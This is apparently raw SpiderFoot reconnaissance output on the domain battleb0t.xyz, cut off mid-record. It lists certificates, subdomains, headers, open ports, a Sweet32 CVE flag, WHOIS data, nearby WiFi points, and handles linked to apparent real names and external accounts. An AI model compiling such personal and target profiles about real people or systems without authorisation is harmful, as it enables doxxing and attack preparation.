Serial Number:
03:8d:d7:e0:05:18:38:a5:db:8a:48:64:f2:68:9a:98:22:c8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 26 02:43:31 2023 GMT
Not After : Jul 25 02:43:30 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Apr 26 03:43:31.388 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 26 03:43:31.409 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:44:03 | Username | No | SpiderFoot UI | 7 | 0 | 0 | 0 | None | _BattleB0t_ | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 02:53:45 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache_Hits": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["C1F8:9B05:D303FE:F3CF12:645CF509"], "Age": ["0"], "X_Cache_Hits": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-gig2250041-GIG"], "X_Cache": ["MISS"], "X_Timer": ["S1683813642.858818,VS0,VE273"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["df03515606cb10d86a4e0fd793a1bc65b6eaa2df"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8002::153 |
| 2023-05-12 02:54:00 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 104.21.6.166 |
| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | jloup@gzip.org | |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | wattpad (Category: social)
https://www.wattpad.com/user/Altpapier | Altpapier |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-access-domain: panel.battleb0t.xyz | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.220): Search Engine Last Activity: 0 days ago Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Brandon (Net ID: C4:49:BB:70:F9:3A) | 37.751, -97.822 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TEKER PERFORMANS (Net ID: 00:13:33:8D:5A:FE) | 40.2024, 29.0398 |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 2 | 0 | 2 | 0 | None | rathook.cc | 185.199.111.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Intel Gateway (Net ID: 00:02:B3:A5:C9:64) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Keybase (Category: social) https://keybase.io/login | login |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.83): Search Engine Last Activity: 0 days ago Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:38 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00yongshiwangzi.github.io |
| 2023-05-12 02:46:03 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'North Charleston', u'security': {u'is_vpn': False}, u'city_geoname_id': 4589387, u'region_geoname_id': 4597040, u'country': u'United States', u'region': u'South Carolina', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'GOOGLE-CLOUD-PLATFORM', u'isp_name': u'Halliburton Company', u'organization_name': u'Halliburton Company', u'autonomous_system_number': 396982}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'29415', u'longitude': -79.9746, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:46:02'}, u'latitude': 32.8608, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'34.148.97.127', u'continent': u'North America', u'region_iso_code': u'SC'} | 34.148.97.127 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom (Net ID: 00:0C:F6:37:01:3C) | 50.8897, 6.0563 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0001vrn.github.io | 185.199.111.153 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | MCUUID (Minecraft) (Category: gaming) https://mcuuid.net/?q=battleb0t | battleb0t |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.114 | 35.229.48.116 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00p513-dev.github.io | 185.199.111.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 3Com (Net ID: 00:04:75:62:7A:78) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | herron-libson (Net ID: 00:01:24:F1:75:B2) | 37.780462,-122.390564 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CH2SC6TY (Net ID: 00:16:46:71:5C:B0) | 32.8608, -79.9746 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Twitter (Category: social) https://twitter.com/ayshoo | ayshoo |
| 2023-05-12 03:12:41 | Vulnerability - CVE High | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2016-2183 https://nvd.nist.gov/vuln/detail/CVE-2016-2183 Score: 7.5 Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. | 188.114.97.1 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | DTT (Net ID: 00:02:2D:2C:9F:8D) | 34.0544, -118.244 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:143 | 87.248.157.102 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 5 | 0 | None | Nics Telekomunikasyon Ltd. | Domain Name: KEYUBU.NET
Registry Domain ID: 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registry Expiry Date: 2024-07-31T21:39:25Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.NET
Registry Domain ID : 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registrar Registration Expiration Date: 2024-07-31T21:39:25Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.NET
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T02:59:37Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 02:54:13 | HTTP Headers | No | Web Spider | 8 | 0 | 3 | 0 | None | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} | https://battleb0t.xyz/main.built.js |
| 2023-05-12 03:10:03 | Affiliate - Internet Name | No | DNS Resolver | 10 | 0 | 4 | 0 | None | baffin.netcraft.com | 207.154.228.159 |
| 2023-05-12 02:44:22 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.108.153 |
| 2023-05-12 03:32:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.4:8443 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/css | http://nuke.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 03:01:32 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 3 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://vscode.battleb0t.xyz', u'http_status': 521, u'plugins': {u'HTTPServer': {u'string': [u'cloudflare']}, u'Script': {}, u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'Title': {u'string': [u'vscode.battleb0t.xyz | 521: Web server is down']}, u'HTML5': {}, u'UncommonHeaders': {u'string': [u'referrer-policy,cf-ray']}, u'IP': {u'string': [u'104.21.71.14']}, u'X-Frame-Options': {u'string': [u'SAMEORIGIN']}, u'X-UA-Compatible': {u'string': [u'IE=Edge']}}}, {}] | vscode.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | fotka (Category: social) https://fotka.com/profil/login | login |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.122 | 35.229.48.116 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AMX (Net ID: 00:02:E3:40:F7:BD) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.151): Search Engine Last Activity: 0 days ago Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', 
u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': 
u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', 
u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': 